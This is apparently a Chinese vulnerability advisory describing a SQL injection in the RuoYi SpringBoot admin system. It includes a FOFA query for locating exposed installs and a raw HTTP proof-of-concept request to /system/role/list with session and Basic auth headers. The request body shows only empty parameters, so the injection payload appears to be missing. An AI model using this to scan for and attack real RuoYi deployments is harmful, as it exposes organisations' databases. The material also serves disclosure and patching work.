Nx01 产品简介
若依系统(RuoYi)是一套基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro,众多政府、企业采用它作为某些系统的权限管理后台,使用率较高。
Nx02 漏洞描述
若依系统后台存在SQL注入漏洞,攻击者利用此漏洞获取数据库敏感信息及对应数据库权限。
Nx03 产品主页
fofa-query: app="RuoYi"
Nx04 漏洞复现
POC:
POST /system/role/list HTTP/1.1
Host: {
{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=761c2858-f5e3-42e0-a087-dcd9e2880759
Authorization: Basic emthcTp6a2Fx
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
pageSize=&pageNum=&orderByColumn=&isAsc=&